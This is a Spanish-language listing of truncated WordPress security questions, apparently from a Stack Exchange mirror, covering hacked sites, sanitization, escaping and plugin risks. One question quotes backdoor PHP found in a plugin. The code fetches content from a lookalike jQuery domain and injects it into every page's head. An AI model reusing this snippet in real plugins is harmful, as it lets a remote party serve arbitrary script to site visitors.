Preguntas etiquetadas con security

Cerrado. Esta pregunta está fuera de tema . Actualmente no está aceptando respuestas. ¿Quieres mejorar esta pregunta? Actualice la pregunta para que sea sobre el tema de WordPress Development Stack Exchange. Cerrado hace 4 años . Instalé el complemento Simple Login Lockdown y desde hace un par de días la …

20 login  security 

Tuve un cliente que fue pirateado recientemente y noté que aparecían personajes extraños en su sitio, como  y Æ. Resulta que los hackers cambiaron el blog_charset a UTF-7 en la wp_optionstabla de la base de datos. Lo configuré de nuevo en UTF-8, pero me preguntaba si durante el tiempo …

19 security  encoding  hacked  characters 

Soy nuevo en WordPress. Hace poco leí un artículo sobre cómo los hackers pueden explotar vulnerabilidades en los complementos. Varias fuentes, como Google Pagespeed, también me han disuadido de usar complementos o al menos mantenerlo al mínimo. Personalmente, también trato de evitar los complementos porque me siento más en control …

19 plugins  security 

Actualmente estoy desarrollando un complemento y es muy probable que lo publique en el repositorio de complementos públicos para que otros puedan usarlo. El complemento usará una API y para usar esta API debe pasar un nombre de usuario y contraseña. Por lo tanto, mi complemento necesita almacenar estas credenciales …

19 plugin-development  security  api  encryption 

Encontré esto en un complemento. ¿Qué hace? ¿Es peligroso? add_action('admin_enqueue_scripts', 'pw_load_scripts'); if (!function_exists('wp__head'){ function wp__head() { if(function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); $jquery = curl_exec($ch); curl_close($ch); echo "$jquery"; } } add_action('wp_head', 'wp__head'); }

17 plugins  wp-admin  security  curl 

Quiero asegurarme de que todos los datos de mis complementos / temas se manejen de forma segura antes de ingresar a la base de datos y antes de enviarlos al navegador. Mi problema es que hay situaciones en las que la API maneja la desinfección por usted, como al guardar …

17 plugin-development  security  customization  validation  sanitization 

¿El mantenimiento wp-admin/install.phpy wp-admin/install-helper.phpuna fuga de seguridad en las versiones más nuevas de WordPress? Por defecto, el permiso de archivo en esos archivos es 644. Si hay alguna fuga, ¿qué tipo de por favor?

16 security  installation 

Tal como está actualmente, esta pregunta no es adecuada para nuestro formato de preguntas y respuestas. Esperamos que las respuestas estén respaldadas por hechos, referencias o experiencia, pero esta pregunta probablemente solicitará debate, argumentos, encuestas o discusión extendida. Si cree que esta pregunta se puede mejorar y posiblemente volver a …

16 plugins  plugin-development  security  sql 

Veo que los SVG están bloqueados de manera predeterminada en el cargador de medios y debe agregarlo como un tipo MIME compatible en functions.php. ¿Qué razones de seguridad hay detrás de esto?

15 media  security  svg 

Había mirado el código pero no pude ver ningún escape en funciones como the_title the_content the_excerptetc. Puede que no lo esté leyendo bien. ¿Necesito escapar de estas funciones en el desarrollo de temas como: esc_html ( the_title () ) Editar: como se señaló en las respuestas a continuación, el código …

15 security  escaping 

Tenemos algunos problemas con un desarrollador externo. Queremos limitar el acceso al wp-adminsitio solo al acceso interno (a través de VPN ). Simplemente para que no sea atacado por usuarios externos. Podemos enumerar los administradores del sitio y no queremos que sean phishing. Nuestro desarrollador dice que no podemos hacer …

14 admin  ajax  security 

Solo una pregunta rápida que podría ayudar un poco con la seguridad. Noté que el archivo readme.html tiene el número de versión listado. Reaparece después de cada actualización y también lo hacen licence.txt y wp-config-sample.php. ¿Hay una manera fácil de hacer que WordPress elimine automáticamente estos archivos después de una …

13 security  wp-config 

Configurar WordPress para actualizar dentro de la aplicación (es decir, WordPress) es ideal para mí debido a su conveniencia. Sin embargo, estoy preocupado por los requisitos. Los campos solicitados que aparecen después de instalar ssh2 para php preguntan no solo mi clave pública, sino también mi clave privada. Creo que, …

13 security  updates  ssh 

Mirando el Codex para wp_insert_post () , establece que esta función "... desinfecta las variables, realiza algunas comprobaciones, completa las variables faltantes como fecha / hora, etc." (EDITAR: Actualicé la entrada del Codex para incluir un ejemplo más robusto que incluye seguridad, así como meta meta y asignación de categoría) …

13 security  sanitization 

Esto dificulta mi codificación. Wordpress codex razona el uso de esc_url al hablar vagamente sobre seguridad. ¿Pero realmente vale la pena? Por ejemplo, ¿cuál es el beneficio de seguridad práctico importante al usar <?php echo esc_url( home_url( '/' ) ); ?> en lugar de <?php echo home_url() ?> PD: No …

12 security